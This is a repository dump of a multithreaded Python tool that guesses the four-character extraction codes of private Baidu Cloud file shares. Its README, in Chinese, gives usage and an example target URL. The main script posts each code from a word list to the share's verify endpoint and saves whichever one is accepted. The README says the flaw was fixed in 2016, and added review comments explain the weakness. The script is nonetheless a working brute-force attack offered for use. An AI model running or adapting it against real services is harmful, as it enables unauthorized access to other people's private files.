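├── lib
    ├── __init__.py
    ├── __init__.pyc
    ├── consle_width.pyc
    └── consle_width.py
├── pass.txt
├── README.md
└── baiduyunBrute.py

/lib/__init__.py:
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
/pass.txt:
--------------------------------------------------------------------------------
28bk

--------------------------------------------------------------------------------
/lib/__init__.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Xyntax/baiduyun-brute/HEAD/lib/__init__.pyc
--------------------------------------------------------------------------------
/lib/consle_width.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Xyntax/baiduyun-brute/HEAD/lib/consle_width.pyc
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# baiduyun-brute
多线程百度云(私密分享)密码爆破工具
问题请反馈至 i@cdxy.me

**2016/6/7 由于漏洞修复,该工具现已失效,多线程定向爆破可参考[https://github.com/Xyntax/POC-T/blob/master/script/brute-example.py](https://github.com/Xyntax/POC-T/blob/master/script/brute-example.py)**

## info
爆破百度云私密分享的四位密码(共168万条)
可自定义线程数(默认为30)
自己本子测试30线程一个小时能把字典全跑完
## usage
1. 复制私密分享页面url
![baiduyun.png](http://www.cdxy.me/wp-content/uploads/2015/12/baiduyun.png)
2. `python baiduyunBrute.py -t [thread_num] ["url"]`

示例(注意url外引号):
`python sub.py -t 50 "http://pan.baidu.com/share/init?shareid=385857944&uk=1544574381"`
3. 结果在命令行显示,同时存储到`./pass.txt`查看
![pass-found.png](http://www.cdxy.me/wp-content/uploads/2015/12/pass-found.png)

## reference
- 多线程框架参考[lijiejie](https://github.com/lijiejie)大师的项目[subDomainsBrute](https://github.com/lijiejie/subDomainsBrute)

--------------------------------------------------------------------------------
/lib/consle_width.py:
--------------------------------------------------------------------------------
""" getTerminalSize()
 - get width and height of console
 - works on linux,os x,windows,cygwin(windows)
"""

__all__=['getTerminalSize']


def getTerminalSize():
    """Return the console size as a ``(columns, rows)`` tuple.

    On Windows the console API is tried first and ``tput`` second; on Linux,
    Darwin and CYGWIN* platforms the TIOCGWINSZ ioctl path is used. When no
    probe succeeds, ``(80, 25)`` is returned.
    """
    import platform
    current_os = platform.system()
    tuple_xy=None
    if current_os == 'Windows':
        tuple_xy = _getTerminalSize_windows()
        if tuple_xy is None:
            tuple_xy = _getTerminalSize_tput()
            # needed for window's python in cygwin's xterm!
    if current_os == 'Linux' or current_os == 'Darwin' or current_os.startswith('CYGWIN'):
        tuple_xy = _getTerminalSize_linux()
    if tuple_xy is None:
        # Trace written to stdout whenever the fallback size is used.
        print "default"
        tuple_xy = (80, 25)      # default value
    return tuple_xy

def _getTerminalSize_windows():
    """Query the Windows console buffer; return ``(columns, rows)`` or None.

    None is returned when ctypes/windll is unavailable, when the API call
    raises, or when GetConsoleScreenBufferInfo reports failure.
    """
    res=None
    try:
        from ctypes import windll, create_string_buffer

        # stdin handle is -10
        # stdout handle is -11
        # stderr handle is -12

        # The stderr handle (-12) is the one queried here.
        h = windll.kernel32.GetStdHandle(-12)
        # 22 bytes matches the eleven 16-bit fields unpacked below.
        csbi = create_string_buffer(22)
        res = windll.kernel32.GetConsoleScreenBufferInfo(h, csbi)
    except:
        return None
    if res:
        import struct
        (bufx, bufy, curx, cury, wattr,
         left, top, right, bottom, maxx, maxy) = struct.unpack("hhhhHhhhhhh", csbi.raw)
        # Size of the visible window rectangle, edges inclusive.
        sizex = right - left + 1
        sizey = bottom - top + 1
        return sizex, sizey
    else:
        return None

def _getTerminalSize_tput():
    """Ask ``tput`` for the size; return ``(columns, rows)`` or None.

    ``tput cols`` and ``tput lines`` are started with argument lists, so no
    shell is involved. Any failure (missing binary, non-numeric output)
    yields None.
    """
    # get terminal width
    # src: http://stackoverflow.com/questions/263890/how-do-i-find-the-width-height-of-a-terminal-window
    try:
        import subprocess
        proc=subprocess.Popen(["tput", "cols"],stdin=subprocess.PIPE,stdout=subprocess.PIPE)
        output=proc.communicate(input=None)
        cols=int(output[0])
        proc=subprocess.Popen(["tput", "lines"],stdin=subprocess.PIPE,stdout=subprocess.PIPE)
        output=proc.communicate(input=None)
        rows=int(output[0])
        return (cols,rows)
    except:
        return None


def _getTerminalSize_linux():
    """Return ``(columns, rows)`` from the tty, or None if it cannot be found.

    Probes, in order: the TIOCGWINSZ ioctl on fds 0, 1 and 2; the same ioctl
    on the controlling terminal named by ``os.ctermid()``; and finally the
    ``LINES`` / ``COLUMNS`` environment variables.
    """
    # Imported at function scope because both fallbacks below use it.
    # Previously ``os`` was imported only inside ioctl_GWINSZ, so the
    # controlling-terminal fallback raised NameError (silently swallowed),
    # and the environment fallback read an undefined name ``env``.
    import os

    def ioctl_GWINSZ(fd):
        # Returns (rows, cols) for fd, or None when fd is not a terminal or
        # the fcntl/termios modules are unavailable.
        try:
            import fcntl, termios, struct
            cr = struct.unpack('hh', fcntl.ioctl(fd, termios.TIOCGWINSZ,'1234'))
        except Exception:
            return None
        return cr
    cr = ioctl_GWINSZ(0) or ioctl_GWINSZ(1) or ioctl_GWINSZ(2)
    if not cr:
        try:
            fd = os.open(os.ctermid(), os.O_RDONLY)
            try:
                cr = ioctl_GWINSZ(fd)
            finally:
                os.close(fd)
        except Exception:
            pass
    if not cr:
        try:
            # Same (rows, cols) order as the ioctl result; non-numeric values
            # are treated as "unknown" instead of raising to the caller.
            cr = (int(os.environ['LINES']), int(os.environ['COLUMNS']))
        except (KeyError, ValueError):
            return None
    return int(cr[1]), int(cr[0])

if __name__ == "__main__":
    sizex,sizey=getTerminalSize()
    print  'width =',sizex,'height =',sizey
--------------------------------------------------------------------------------
/baiduyunBrute.py:
--------------------------------------------------------------------------------
# !/usr/bin/env python
# -*- encoding: utf-8 -*-

# Review note: per the README, this script guessed the four-character
# extraction code of a private Baidu Cloud share and stopped working on
# 2016/6/7 after the vulnerability was fixed (the README does not say what
# the fix was). The README's figure of about 1.68 million candidates matches
# 36**4 = 1,679,616, i.e. a lowercase-alphanumeric alphabet (inferred). A code
# space that small only protects a share if the verification endpoint limits
# attempts (throttling, lockout or CAPTCHA per share and per client). The
# traffic this script produces is a sustained run of form POSTs to the verify
# URL from one client, each with a different `pwd` value.

import Queue
import sys
import threading
import time
import optparse
import requests
from lib.consle_width import getTerminalSize


class baiduBrute:
    """Thread pool that submits candidate codes from a word list to one URL.

    Candidates are read from ``./dic.txt`` (not part of the file tree shown
    for this repository) into a queue shared by the worker threads. A hit is
    printed and written to ``./pass.txt``.
    """

    def __init__(self, target, threads_num):
        """Prepare the request URL, counters, lock, word-list queue and headers.

        target      -- share URL given on the command line; every "link" and
                       "init" substring in it is replaced with "verify".
        threads_num -- number of worker threads that run() will start.
        """
        self.target = target.replace("link", "verify").replace("init", "verify").strip()
        self.names_file = "./dic.txt"
        self.thread_count = self.threads_num = threads_num
        self.scan_count = self.found_count = 0
        self.lock = threading.Lock()
        self.console_width = getTerminalSize()[0]
        self.console_width -= 2  # Cal width when starts up
        self._load_pass()
        # outfile = target + '.txt' if not output else output
        # self.outfile = open(outfile, 'w')   # won't close manually
        self.headers = {
            "Content-Type": "application/x-www-form-urlencoded"
        }

    # Read the word list into the queue.
    def _load_pass(self):
        """Fill ``self.queue`` with the non-empty, stripped lines of the word list."""
        self.queue = Queue.Queue()
        with open(self.names_file) as f:
            for line in f:
                sub = line.strip()
                if sub:
                    self.queue.put(sub)

    def _update_scan_count(self):
        """Increment the count of processed candidates while holding the lock."""
        self.lock.acquire()
        self.scan_count += 1
        self.lock.release()

    def _print_progress(self):
        """Rewrite the status line (found / remaining / scanned / elapsed).

        The message is right-aligned to the console width measured in
        __init__. Reads ``self.start_time``, which run() sets.
        """
        self.lock.acquire()
        msg = '%s found | %s remaining | %s scanned in %.2f seconds' % (
            self.found_count, self.queue.qsize(), self.scan_count, time.time() - self.start_time)
        sys.stdout.write('\r' + ' ' * (self.console_width - len(msg)) + msg)
        sys.stdout.flush()
        self.lock.release()

    def _scan(self):
        """Worker loop: take candidates from the queue and submit each one.

        Each candidate is POSTed as the form body ``pwd=<candidate>`` to
        ``self.target``. A ``Set-Cookie`` response header containing
        ``BDCLND=`` is treated as an accepted code: it is printed, counted and
        written to ``./pass.txt`` (opened with ``'w'``, so the file holds only
        the most recent hit). Exceptions raised inside the ``try`` are
        swallowed by the bare ``except``; the candidate is still counted as
        scanned. The worker decrements ``thread_count`` when the queue is
        empty.
        """
        while self.queue.qsize() > 0:
            payload = self.queue.get(timeout=1.0)
            try:
                res = requests.post(url=self.target, data="pwd=" + payload, headers=self.headers)
                answer = res.headers["set-cookie"]
                if answer:
                    self.lock.acquire()
                    if "BDCLND=" in answer:
                        print "\nOK! password found: " + payload
                        self.found_count += 1
                        f = open("./pass.txt", 'w')
                        f.write(payload + '\n')
                        f.close()
                        # exit(1)
                    else:
                        pass
                    self.lock.release()
            except:
                pass
            self._update_scan_count()
            self._print_progress()
        self._print_progress()
        self.lock.acquire()
        self.thread_count -= 1
        self.lock.release()

    def run(self):
        """Start the workers and wait until they finish or a hit is recorded.

        Workers are daemon threads, so they do not keep the process alive once
        this method returns. The wait is a 10 ms polling loop on
        ``thread_count`` and ``found_count``.
        """
        self.start_time = time.time()
        for i in range(self.threads_num):
            t = threading.Thread(target=self._scan, name=str(i))
            t.setDaemon(True)
            t.start()
        while self.thread_count > 0 and self.found_count == 0:
            time.sleep(0.01)


if __name__ == '__main__':
    parser = optparse.OptionParser('usage: %prog [options] target')
    # NOTE(review): the effective default is 10; the help text and the README
    # both say 30.
    parser.add_option('-t', '--threads', dest='threads_num',
                      default=10, type='int',
                      help='Number of threads. default = 30')
    # NOTE(review): -o is parsed but never passed to baiduBrute; the output
    # path is hard-coded to ./pass.txt in _scan.
    parser.add_option('-o', '--output', dest='output', default=None,
                      type='string', help='Output file name. default is {target}.txt')

    (options, args) = parser.parse_args()
    if len(args) < 1:
        parser.print_help()
        sys.exit(0)

    d = baiduBrute(target=args[0],
                   threads_num=options.threads_num, )
    d.run()

--------------------------------------------------------------------------------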